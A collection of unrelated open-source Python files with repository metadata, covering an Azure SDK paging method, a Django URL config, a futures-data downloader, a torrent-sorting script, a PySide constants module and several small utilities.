apply directly or from management groups that contain the given management group. If
$filter=atExactScope() is provided, the returned list only includes all policy definitions that
at the given management group. If $filter='policyType -eq {value}' is provided, the returned
list only includes all policy definitions whose type match the {value}. Possible policyType
values are NotSpecified, BuiltIn, Custom, and Static. If $filter='category -eq {value}' is
provided, the returned list only includes all policy definitions whose category match the
{value}.
:param management_group_id: The ID of the management group.
:type management_group_id: str
:param filter: The filter to apply on the operation. Valid values for $filter are:
'atExactScope()', 'policyType -eq {value}' or 'category eq '{value}''. If $filter is not
provided, no filtering is performed. If $filter=atExactScope() is provided, the returned list
only includes all policy definitions that at the given scope. If $filter='policyType -eq
{value}' is provided, the returned list only includes all policy definitions whose type match
the {value}. Possible policyType values are NotSpecified, BuiltIn, Custom, and Static. If
$filter='category -eq {value}' is provided, the returned list only includes all policy
definitions whose category match the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_management_group_request(
management_group_id=management_group_id,
filter=filter,
top=top,
template_url=self.list_by_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_management_group_request(
management_group_id=management_group_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/policy/v2021_06_01/aio/operations/_policy_definitions_operations.py
|
Python
|
mit
| 32,611
|
from django.conf.urls import url, include
from diaries.api import *
urlpatterns = [
url(r'^diary/', include("english_diary.urls.api.diary", namespace="diary")),
url(r'^naver/', include("english_diary.urls.api.naver", namespace="naver")),
url(r'^user/', include("english_diary.urls.api.user", namespace="user")),
]
|
jupiny/EnglishDiary
|
english_diary/english_diary/urls/api/__init__.py
|
Python
|
mit
| 329
|
import sys
import os
import numpy
l = []
for lines in open(sys.argv[1], 'rU'):
lines = lines.strip()
lexemes = lines.split('\t')
if len(lexemes) == 12:
seq_id = lexemes[3]
seq_len = int(lexemes[5])
avg_Q = int(lexemes[-4])
overlap = int(lexemes[-3])
if avg_Q >= 25:
# print seq_id
l.append(overlap)
# if overlap == max(s_l):
# s_ol.append(seq_len)
# elif seq_len >= 100 and avg_Q >= 27 and overlap > 40:
# l.append(overlap)
# if overlap == max(l):
# ol.append(seq_len)
#print "There are %s assembled reads that have over 80b overlaps, with a Q >= 25." % len(l)
print "The shortest overlap is: %s" % min(l)
print "The longest overlap is: %s" % max(l)
print "The average overlap is: %s" % numpy.mean(l)
print "The standard deviation of overlap is: %s" % numpy.std(l)
|
chnops/code
|
rdp_assem_stat_parser.py
|
Python
|
mit
| 804
|
# pylint: disable=C0111,R0903
# -*- coding: utf-8 -*-
"""Displays information about the current song in mocp. Left click toggles play/pause. Right click toggles shuffle.
Requires the following executable:
* mocp
Parameters:
* mocp.format: Format string for the song information. Replace string sequences with the actual information:
* %state State
* %file File
* %title Title, includes track, artist, song title and album
* %artist Artist
* %song SongTitle
* %album Album
* %tt TotalTime
* %tl TimeLeft
* %ts TotalSec
* %ct CurrentTime
* %cs CurrentSec
* %b Bitrate
* %r Sample rate
contributed by `chrugi <https://github.com/chrugi>`_ - many thanks!
"""
import core.module
import core.widget
import core.input
import util.cli
class Module(core.module.Module):
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.description))
core.input.register(self, button=core.input.LEFT_MOUSE, cmd="mocp -G")
core.input.register(self, button=core.input.RIGHT_MOUSE, cmd="mocp -t shuffle")
self.__format = self.parameter("format", "%state %artist - %song | %ct/%tt")
self.__running = False
def description(self, widget):
return self.__info if self.__running == True else "Music On Console Player"
def update(self):
self.__load_song()
def __load_song(self):
try:
self.__info = util.cli.execute("mocp -Q '{}'".format(self.__format)).strip()
self.__running = True
except RuntimeError:
self.__running = False
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
tobi-wan-kenobi/bumblebee-status
|
bumblebee_status/modules/contrib/mocp.py
|
Python
|
mit
| 1,800
|
# encoding: UTF-8
"""
本模块中主要包含:
1. 从通联数据下载历史行情的引擎
2. 用来把MultiCharts导出的历史数据载入到MongoDB中用的函数
"""
import os,sys
from datetime import datetime, timedelta
import pymongo
from time import time
from multiprocessing.pool import ThreadPool
from ctaBase import *
from vtConstant import *
from vtFunction import loadMongoSetting
from datayesClient import DatayesClient
# 以下为vn.trader和通联数据规定的交易所代码映射
VT_TO_DATAYES_EXCHANGE = {}
VT_TO_DATAYES_EXCHANGE[EXCHANGE_CFFEX] = 'CCFX' # 中金所
VT_TO_DATAYES_EXCHANGE[EXCHANGE_SHFE] = 'XSGE' # 上期所
VT_TO_DATAYES_EXCHANGE[EXCHANGE_CZCE] = 'XZCE' # 郑商所
VT_TO_DATAYES_EXCHANGE[EXCHANGE_DCE] = 'XDCE' # 大商所
DATAYES_TO_VT_EXCHANGE = {v:k for k,v in VT_TO_DATAYES_EXCHANGE.items()}
########################################################################
class HistoryDataEngine(object):
"""CTA模块用的历史数据引擎"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
host, port, logging = loadMongoSetting()
self.dbClient = pymongo.MongoClient(host, port)
self.datayesClient = DatayesClient()
#----------------------------------------------------------------------
def lastTradeDate(self):
"""获取最近交易日(只考虑工作日,无法检查国内假期)"""
today = datetime.now()
oneday = timedelta(1)
if today.weekday() == 5:
today = today - oneday
elif today.weekday() == 6:
today = today - oneday*2
return today.strftime('%Y%m%d')
#----------------------------------------------------------------------
def readFuturesProductSymbol(self):
"""查询所有期货产品代码"""
cx = self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].find()
return set([d['productSymbol'] for d in cx]) # 这里返回的是集合(因为会重复)
#----------------------------------------------------------------------
def readFuturesSymbol(self):
"""查询所有期货合约代码"""
cx = self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].find()
return [d['symbol'] for d in cx] # 这里返回的是列表
#----------------------------------------------------------------------
def downloadFuturesSymbol(self, tradeDate=''):
"""下载所有期货的代码"""
if not tradeDate:
tradeDate = self.lastTradeDate()
self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].ensure_index([('symbol', pymongo.ASCENDING)],
unique=True)
path = 'api/market/getMktMFutd.json'
params = {}
params['tradeDate'] = tradeDate
data = self.datayesClient.downloadData(path, params)
if data:
for d in data:
symbolDict = {}
symbolDict['symbol'] = d['ticker']
symbolDict['productSymbol'] = d['contractObject']
flt = {'symbol': d['ticker']}
self.dbClient[SETTING_DB_NAME]['FuturesSymbol'].update_one(flt, {'$set':symbolDict},
upsert=True)
print u'期货合约代码下载完成'
else:
print u'期货合约代码下载失败'
#----------------------------------------------------------------------
def downloadFuturesDailyBar(self, symbol):
"""
下载期货合约的日行情,symbol是合约代码,
若最后四位为0000(如IF0000),代表下载连续合约。
"""
print u'开始下载%s日行情' %symbol
# 查询数据库中已有数据的最后日期
cl = self.dbClient[DAILY_DB_NAME][symbol]
cx = cl.find(sort=[('datetime', pymongo.DESCENDING)])
if cx.count():
last = cx[0]
else:
last = ''
# 主力合约
if '0000' in symbol:
path = 'api/market/getMktMFutd.json'
params = {}
params['contractObject'] = symbol.replace('0000', '')
params['mainCon'] = 1
if last:
params['startDate'] = last['date']
# 交易合约
else:
path = 'api/market/getMktFutd.json'
params = {}
params['ticker'] = symbol
if last:
params['startDate'] = last['date']
# 开始下载数据
data = self.datayesClient.downloadData(path, params)
if data:
# 创建datetime索引
self.dbClient[DAILY_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = d.get('tradeDate', '').replace('-', '')
bar.time = ''
bar.datetime = datetime.strptime(bar.date, '%Y%m%d')
bar.volume = d.get('turnoverVol', 0)
bar.openInterest = d.get('openInt', 0)
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[DAILY_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
print u'%s下载完成' %symbol
else:
print u'找不到合约%s' %symbol
#----------------------------------------------------------------------
def downloadAllFuturesDailyBar(self):
"""下载所有期货的主力合约日行情"""
start = time()
print u'开始下载所有期货的主力合约日行情'
productSymbolSet = self.readFuturesProductSymbol()
print u'代码列表读取成功,产品代码:%s' %productSymbolSet
# 这里也测试了线程池,但可能由于下载函数中涉及较多的数据格
# 式转换,CPU开销较大,多线程效率并无显著改变。
#p = ThreadPool(10)
#p.map(self.downloadFuturesDailyBar, productSymbolSet)
#p.close()
#p.join()
for productSymbol in productSymbolSet:
self.downloadFuturesDailyBar(productSymbol+'0000')
print u'所有期货的主力合约日行情已经全部下载完成, 耗时%s秒' %(time()-start)
#----------------------------------------------------------------------
def downloadFuturesIntradayBar(self, symbol):
"""下载期货的日内分钟行情"""
print u'开始下载%s日内分钟行情' %symbol
# 日内分钟行情只有具体合约
path = 'api/market/getFutureBarRTIntraDay.json'
params = {}
params['instrumentID'] = symbol
params['unit'] = 1
data = self.datayesClient.downloadData(path, params)
if data:
today = datetime.now().strftime('%Y%m%d')
# 创建datetime索引
self.dbClient[MINUTE_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = today
bar.time = d.get('barTime', '')
bar.datetime = datetime.strptime(bar.date + ' ' + bar.time, '%Y%m%d %H:%M')
bar.volume = d.get('totalVolume', 0)
bar.openInterest = 0
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[MINUTE_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
print u'%s下载完成' %symbol
else:
print u'找不到合约%s' %symbol
#----------------------------------------------------------------------
def downloadEquitySymbol(self, tradeDate=''):
"""下载所有股票的代码"""
if not tradeDate:
tradeDate = self.lastTradeDate()
self.dbClient[SETTING_DB_NAME]['EquitySymbol'].ensure_index([('symbol', pymongo.ASCENDING)],
unique=True)
path = 'api/market/getMktEqud.json'
params = {}
params['tradeDate'] = tradeDate
data = self.datayesClient.downloadData(path, params)
if data:
for d in data:
symbolDict = {}
symbolDict['symbol'] = d['ticker']
flt = {'symbol': d['ticker']}
self.dbClient[SETTING_DB_NAME]['EquitySymbol'].update_one(flt, {'$set':symbolDict},
upsert=True)
print u'股票代码下载完成'
else:
print u'股票代码下载失败'
#----------------------------------------------------------------------
def downloadEquityDailyBar(self, symbol):
"""
下载股票的日行情,symbol是股票代码
"""
print u'开始下载%s日行情' %symbol
# 查询数据库中已有数据的最后日期
cl = self.dbClient[DAILY_DB_NAME][symbol]
cx = cl.find(sort=[('datetime', pymongo.DESCENDING)])
if cx.count():
last = cx[0]
else:
last = ''
# 开始下载数据
path = 'api/market/getMktEqud.json'
params = {}
params['ticker'] = symbol
if last:
params['beginDate'] = last['date']
data = self.datayesClient.downloadData(path, params)
if data:
# 创建datetime索引
self.dbClient[DAILY_DB_NAME][symbol].ensure_index([('datetime', pymongo.ASCENDING)],
unique=True)
for d in data:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
try:
bar.exchange = DATAYES_TO_VT_EXCHANGE.get(d.get('exchangeCD', ''), '')
bar.open = d.get('openPrice', 0)
bar.high = d.get('highestPrice', 0)
bar.low = d.get('lowestPrice', 0)
bar.close = d.get('closePrice', 0)
bar.date = d.get('tradeDate', '').replace('-', '')
bar.time = ''
bar.datetime = datetime.strptime(bar.date, '%Y%m%d')
bar.volume = d.get('turnoverVol', 0)
except KeyError:
print d
flt = {'datetime': bar.datetime}
self.dbClient[DAILY_DB_NAME][symbol].update_one(flt, {'$set':bar.__dict__}, upsert=True)
print u'%s下载完成' %symbol
else:
print u'找不到合约%s' %symbol
#----------------------------------------------------------------------
def loadMcCsv(fileName, dbName, symbol):
"""将Multicharts导出的csv格式的历史数据插入到Mongo数据库中"""
import csv
start = time()
print u'开始读取CSV文件%s中的数据插入到%s的%s中' %(fileName, dbName, symbol)
# 锁定集合,并创建索引
host, port, logging = loadMongoSetting()
client = pymongo.MongoClient(host, port)
collection = client[dbName][symbol]
collection.ensure_index([('datetime', pymongo.ASCENDING)], unique=True)
# 读取数据和插入到数据库
reader = csv.DictReader(file(fileName, 'r'))
for d in reader:
bar = CtaBarData()
bar.vtSymbol = symbol
bar.symbol = symbol
bar.open = float(d['Open'])
bar.high = float(d['High'])
bar.low = float(d['Low'])
bar.close = float(d['Close'])
bar.date = datetime.strptime(d['Date'], '%Y/%m/%d').strftime('%Y%m%d')
bar.time = d['Time']
bar.datetime = datetime.strptime(bar.date + ' ' + bar.time, '%Y%m%d %H:%M:%S')
bar.volume = d['TotalVolume']
flt = {'datetime': bar.datetime}
collection.update_one(flt, {'$set':bar.__dict__}, upsert=True)
print bar.date, bar.time
print u'插入完毕,耗时:%s' % (time()-start)
if __name__ == '__main__':
## 简单的测试脚本可以写在这里
from time import sleep
e = HistoryDataEngine()
sleep(1)
#e.downloadFuturesSymbol("20170303")
#e.downloadAllFuturesDailyBar()
#e.downloadEquityDailyBar('000001')
# 这里将项目中包含的股指日内分钟线csv导入MongoDB,作者电脑耗时大约3分钟
loadMcCsv('IF0000_1min.csv', MINUTE_DB_NAME, 'IF0000')
|
zhengwsh/InplusTrader_Linux
|
InplusTrader/ctaAlgo/ctaHistoryData.py
|
Python
|
mit
| 14,272
|
class Field:
def __init__(self, (x,y,z), radius):
self.coords = (x,y,z)
self.radius = radius
class AsteroidField(Field)
class MineField(Field)
class NavPoint:
def __init__(self, ships = (), fields = (), coords = (x,y,z), stealth_flag = 0):
self.ships = ships
self.fields = fields
self.coords = (x,y,z)
self.stealth_flag = stealth_flag
class FlightMission:
def __init__(self, navpoints = (), navmap):
self.navpoints = navpoints
self.navmap = navmap
|
delMar43/wcmodtoolsources
|
WC1_clone/data_structures/FlightMission.py
|
Python
|
mit
| 481
|
import argparse
import sys
import os
import json
import math
import re
import datetime
import html
import subprocess
import requests
import appdirs
from ratelimit import *
__version__ = "0.1"
headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)'\
'AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.79'\
'Safari/535.11',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9'\
',*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3'}
class GazelleSort:
class RequestException(BaseException):
pass
def __init__(self, configdir):
self.configfilepath = os.path.join(configdir, "config.json")
self.error = False
self.session = requests.Session()
self.session.headers.update(headers)
self.authkey = None
self.snatches = []
self.torrentdata = {}
# Check if config file exists. If not, create default file.
if not os.path.isfile(self.configfilepath):
print("ERROR:")
print("Config file not found at config path: %s" % self.configfilepath)
print("A default config has been put in the location. Please edit it to your liking before running again.")
with open(self.configfilepath, "w") as f:
defaultconfig = {
"url": "",
"username": "",
"password": "",
"torrentdir": "",
"destdirs": {
"flac24bit": "",
"flac": "",
"320": "",
"v0": "",
"v2": ""
},
"pattern": {
"string": "%(artist)s - %(album)s (%(year)s) [%(format)s]",
"variousartists": "Various Artists",
"artistjoiner": " & ",
"listindividualartists": 2
}
}
f.write(json.dumps(defaultconfig, indent=4, sort_keys=True))
self.error = True
return
else:
with open(self.configfilepath, "r") as f:
self.config = json.loads(f.read())
def __del__(self):
pass
def checkConfig(self):
"""Checks if all necessary config options are present"""
# Check if all required parameters exist
necessaryparams = [("url", str), ("username", str), ("password", str), ("torrentdir", str), ("destdirs", dict), ("pattern", dict)]
if not all(item in self.config for item in [x[0] for x in necessaryparams]):
print("ERROR:")
print("Required settings missing from config file:")
for missing in [item for item in necessaryparams if item not in self.config]:
print(" " + missing)
return False
# Check if all required parameters are of correct type
if any([not isinstance(self.config[x[0]], x[1]) for x in necessaryparams]):
print("ERROR:")
print("Entries from config have wrong type:")
for wrong in [x for x in necessaryparams if not isinstance(self.config[x[0]], x[1])]:
print(" Param: '%s' (%s) should be of type: %s" % (wrong[0], type(self.config[wrong[0]]), wrong[1]))
return False
return True
@rate_limited(0.5)
def login(self):
"""Login and store cookie"""
login = self.config["url"] + "/login.php"
payload = {'username': self.config["username"],
'password': self.config["password"],
'keeplogged': 1,
'login': 'Login'
}
response = self.session.post(login, data=payload)
return response.status_code
@rate_limited(0.5)
def logout(self):
logout = self.config["url"] + "/logout.php"
self.session.get(logout + "?auth=%s" % self.authkey)
@rate_limited(0.5)
def ajaxrequest(self, action, **kwargs):
"""API Request"""
ajax = self.config["url"] + "/ajax.php"
params = {"action": action}
params.update(kwargs)
if self.authkey is not None:
params["auth"] = self.authkey
response = self.session.get(ajax, params=params, allow_redirects=False)
try:
decoded = response.json() # Get JSON from response
if decoded["status"] == "success":
return decoded # If the api returns a success, return the entire api response
else: # Throw an exception if the api request itself is an error.
if "error" in decoded: # Check if there is an error message. Also redact the authkey for security reasons.
raise GazelleSort.RequestException("Request '%s' failed. Error: %s" % (re.sub("auth=[\da-fA-F]+", "auth=REDACTED", response.url), decoded["error"]))
else:
raise GazelleSort.RequestException("Request '%s' failed. No Error message was returned by API." % response.url)
except json.JSONDecodeError:
raise GazelleSort.RequestException("Request didn't return any JSON. HTTP status code: %s" % response.status_code)
@rate_limited(0.5)
def getSnatched(self):
"""Find all torrents user has snatched"""
torrents = self.config["url"] + "/torrents.php"
profile = self.ajaxrequest("user", id=self.userid)
pages = math.ceil(profile["response"]["community"]["seeding"] / 50)
print("Reading IDs of %s snatched torrents" % profile["response"]["community"]["seeding"])
@rate_limited(1)
def readPage(page):
r = self.session.get(torrents + "?type=seeding&page=%s&userid=%s" % (page + 1, self.userid))
matches = re.findall("torrents.php\?id=(?P<groupid>\d+)&torrentid=(?P<torrentid>\d+)", bytes.decode(r.content))
self.snatches += list(map(lambda x: (int(x[0]), int(x[1])), matches)) # convert list of tuples from string to int
for page in range(pages):
readPage(page)
def prepareDirs(self):
"""Check if destination folders exist, and create them if not"""
for format in self.config["destdirs"]:
if not os.path.isdir(self.config["destdirs"][format]):
print("Creating dir: %s" % self.config["destdirs"][format])
os.makedirs(self.config["destdirs"][format])
if not os.path.isdir(self.config["torrentdir"]):
raise Exception("Torrentdir (%s) doesn't exist or can't be accessed." % self.config["torrentdir"])
def printProgressBar(self, progress, length, heartbeat=False):
"""Print a progress bar"""
if heartbeat:
print("\r⚡[", end="")
else:
print("\r [", end="")
width = 1/length
for i in range(length):
fill = (progress - i*width) / width
if fill < 0:
print(" ", end="")
elif fill < 0.25:
print("▏", end="")
elif fill < 0.5:
print("▎", end="")
elif fill < 0.75:
print("▌", end="")
elif fill < 1.0:
print("▊", end="")
else:
print("█", end="")
print("]", end="", flush=True)
def scanTorrents(self):
"""Iterate through all torrents to fetch their data"""
print("Fetching data of snatched torrents via API.")
print("Due to rate limiting this will approximately take %s" % datetime.timedelta(seconds=len(self.snatches) * 2))
for id in self.snatches:
self.printProgressBar(self.snatches.index(id)/len(self.snatches), 40, bool(self.snatches.index(id)%2))
self.torrentdata[id[1]] = self.ajaxrequest("torrent", id=id[1])["response"]
print("\nDone!")
def renderName(self, torrentdata):
"""Render name from supplied user settings"""
if len(torrentdata["group"]["musicInfo"]["artists"]) > self.config["pattern"]["listindividualartists"]:
artist = self.config["pattern"]["variousartists"]
else:
artist = self.config["pattern"]["artistjoiner"].join(sorted([artist["name"] for artist in torrentdata["group"]["musicInfo"]["artists"]]))
fileformat = torrentdata["torrent"]["format"]
formatdata = {
"artist": artist,
"album": torrentdata["group"]["name"],
"year": torrentdata["group"]["year"],
"format": fileformat
}
name = self.config["pattern"]["string"] % formatdata
return name
def processFiles(self):
for key in self.torrentdata:
torrentdata = self.torrentdata[key]
# Check format
format = torrentdata["torrent"]["format"]
desttype = None
if format == "": # Non-music download, skip
continue
elif format == "FLAC":
if torrentdata["torrent"]["encoding"] == "24bit Lossless":
desttype = "flac24bit"
else:
desttype = "flac"
elif format == "MP3":
pass # TODO: Detect mp3 types
if desttype in self.config["destdirs"]:
destdir = self.config["destdirs"][desttype]
olddir = os.path.join(self.config["torrentdir"], torrentdata["torrent"]["filePath"].replace("/", "\\/"))
newdir = os.path.join(destdir, self.renderName(torrentdata))
# Create directory in destination and create hardlink to files
subprocess.call(["cp", "-Rl", html.unescape(olddir), html.unescape(newdir)], stderr=subprocess.DEVNULL)
def run(self):
"""Run the sorter"""
# If there were any errors on initializing, quit.
if self.error:
return 1
# Check the loaded config
if not self.checkConfig():
return 1
# Login
logincode = self.login()
if not logincode == 200:
print("ERROR:")
print("Login request failed with code %s" % logincode)
# Check if login was success
indexjson = self.ajaxrequest("index")
if indexjson and all([x in indexjson["response"] for x in ["authkey", "passkey", "id"]]):
self.authkey = indexjson["response"]["authkey"]
self.passkey = indexjson["response"]["passkey"]
self.userid = indexjson["response"]["id"]
# Fetch the group and torrent ids of all snatched torrents. This is redone on every program rerun,
# and not cached, as it is likely to change a lot. If you know of any way to get this information directly from
# the api, please drop me a message.
self.getSnatched()
# Prepare destination folders
self.prepareDirs()
# Scan torrents and check if they exist in torrentdir
self.scanTorrents()
# Proceed to process the files
self.processFiles()
self.logout()
return 0
if __name__ == "__main__":
appname = "GazelleSort"
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", type=str,
help="Override config directory, defaults to '%s'" % appdirs.user_config_dir(appname))
args = parser.parse_args()
# Store directory path
configdir = appdirs.user_config_dir(appname)
if args.config:
configdir = args.config
# If config directory does't exist, create it
if not os.path.isdir(configdir):
os.makedirs(configdir)
# Start Gazellesort
gs = GazelleSort(configdir)
sys.exit(gs.run())
|
DrLuke/GazelleSort
|
gazellesort.py
|
Python
|
mit
| 11,974
|
from pythonforandroid.recipe import PythonRecipe
class RequestsRecipe(PythonRecipe):
version = '2.13.0'
url = 'https://github.com/kennethreitz/requests/archive/v{version}.tar.gz'
depends = ['setuptools']
site_packages_name = 'requests'
call_hostpython_via_targetpython = False
recipe = RequestsRecipe()
|
kronenpj/python-for-android
|
pythonforandroid/recipes/requests/__init__.py
|
Python
|
mit
| 327
|
from nose.tools import assert_equal
from ..views.email import download, stringify
from .... import make
def test_download():
app = make()
with app.app_context():
r = download('https://yuno.yande.re/data/preview/d0/94/d094d41d27b75027c48986f1294b3f3a.jpg', 'https://yande.re/')
assert_equal(stringify(r.headers['Content-Type']), 'image/jpeg')
assert_equal(r.status, 200)
|
Answeror/torabot
|
torabot/mods/booru/test/test_download.py
|
Python
|
mit
| 404
|
import _plotly_utils.basevalidators
class SelectedpointsValidator(_plotly_utils.basevalidators.AnyValidator):
def __init__(
self, plotly_name="selectedpoints", parent_name="scatterpolar", **kwargs
):
super(SelectedpointsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/scatterpolar/_selectedpoints.py
|
Python
|
mit
| 478
|
#!/usr/bin/python3
# coding: utf8
###########################################################
#
# anime-checker.py
#
# by Eason Chang <eason@easonchang.com>
#
# A python script to automatically check whether my favorite animes
# have updated and then send me an email to notify me.
#
# This script does a one-time check.
# This script should be set as a scheduled job by using crontab.
#
# Contains 2 config files:
# - .env : stores environment variables of my email addresses and
# password.
# - animes.json : stores a list of my favorite animes, including title,
# website url, and current episode number.
#
###########################################################
import logging
import jsonpickle
from os import path
from packages.gmail.mailClient import MailClient
# Set logging config
logging.basicConfig(level=logging.INFO, format='[%(levelname)s] %(message)s')
# Disable logging
logging.disable(logging.CRITICAL)
mailClient = MailClient()
def loadFile(filePath):
# Load list of my favorite animes from ./storage.json
file = open(filePath, 'r')
fileContent = file.read()
file.close()
content = jsonpickle.decode(fileContent)
return content
def performCheck(DMs):
hasDMUpdated = False
global mailClient
for i in range(len(DMs)):
DM = DMs[i]
if DM.checkUpdate():
# this DM has been updated
# send email
DM.sendMail(mailClient)
# set flag to true
hasDMUpdated = True
return hasDMUpdated
def updateFile(filePath, content):
# Update episode numbers to ./storage.json
jsonpickle.set_encoder_options('simplejson', sort_keys=True, indent=4, ensure_ascii=False)
jsonpickle.set_encoder_options('json', sort_keys=True, indent=4, ensure_ascii=False)
jsonpickle.set_encoder_options('demjson', sort_keys=True, indent=4, ensure_ascii=False)
fileContent = jsonpickle.encode(content)
# fileContent = json.dumps(animes, indent=4, ensure_ascii=False)
file = open(filePath, 'w')
file.write(fileContent)
file.close()
def main():
DMs = None
filePath = path.join(path.dirname(__file__), 'storage.json')
DMs = loadFile(filePath)
hasDMUpdated = performCheck(DMs)
if hasDMUpdated:
updateFile(filePath, DMs)
print('File updated')
else:
print('新番尚未更新哦')
if __name__ == '__main__':
main()
|
Kamigami55/anime-checker
|
main.py
|
Python
|
mit
| 2,465
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Check spelling of a file."""
import logging
# pyspell files
import utils
def check(text, vocabulary):
"""Check ``text`` for mistakes by using ``vocabulary``."""
pass
def main(input_file, vocabulary_file):
"""Automatically check and correct the spelling of a file."""
vocabulary = utils.read_vocabulary(vocabulary_file)
logging.info("Read %i words.", len(vocabulary))
text = utils.read_text(input_file)
check(text, vocabulary)
def get_parser():
"""Return the parser object for this script."""
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description=__doc__,
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("-i", "--input", dest="input",
required=True,
help="input FILE",
metavar="FILE")
parser.add_argument("-v", "--vocabulary", dest="vocabulary_file",
required=True,
help="vocabulary file",
metavar="FILE")
return parser
if __name__ == "__main__":
args = get_parser().parse_args()
main(args.input, args.vocabulary_file)
|
MartinThoma/pyspell
|
pyspell/check.py
|
Python
|
mit
| 1,278
|
from persistence.models import BaseModel
from peewee import *
class Agent(BaseModel):
"""description of class"""
name = CharField(unique=True, null=True)
hostname = CharField(unique=True, null=True)
phonenumber = CharField(unique=True, null=True)
def as_dict(self):
c_timestamp = self.creation_timestamp.isoformat()
m_timestamp = self.modification_timestamp.isoformat()
return {
'id': self.get_id(),
'name': self.name,
'hostname': self.hostname,
'phonenumber': self.phonenumber,
'creation_timestamp': c_timestamp,
'modification_timestamp': m_timestamp
}
|
onnovalkering/sparql-over-sms
|
sos-service/src/persistence/models/agent.py
|
Python
|
mit
| 683
|
from PySide import QtGui, QtCore, QtSql
__updated__ = "2015-07-14 10:12:08"
# Display formats
dateDispFormat = 'M/d/yyyy'
disp_DateTime = 'M/d/yyyy h:map'
timeDispFormat = 'h:mmap'
# Internal formats
DB_Date = 'yyyy-MM-dd'
DB_Time = 'hh:mm:ss'
DB_DateTime = DB_Date + ' ' + DB_Time
# Scanner prefixes
scanPrefix = '%!#'
scanSuffix = scanPrefix[::-1]
# Message window text delay
messageDelay = 10000
# Standard messages
selectOne = '-- Select One --'
returnFor = 'OR return this gear for...'
noActiveMember = 'No member currently selected!!!'
noActiveGear = 'No gear currently selected!!!'
# Global widget grid spacing
layoutGridSpacing = 10
# Colors
color = {'white': QtCore.Qt.white,
'red': QtGui.QColor(225, 60, 60),
'yellow': QtCore.Qt.yellow,
'green': QtGui.QColor(66, 225, 61),
'gray': QtCore.Qt.gray,
'black': QtCore.Qt.black}
# Certifications in database
certifications = ['LeadSport', 'LeadTrad', 'LeadIce', 'KayakRoll']
class KeyPressEater(QtCore.QObject):
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == 16777269:
event.ignore()
event = QtGui.QKeyEvent(QtCore.QEvent.KeyPress, QtCore.Qt.Key_Escape, QtCore.Qt.NoModifier)
return QtCore.QObject.eventFilter(self, obj, event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
self.parent().keyStrokeList = ''
# If the KeyPress event was a character key on the key board
elif event.text().strip():
scanner_just_finished = False
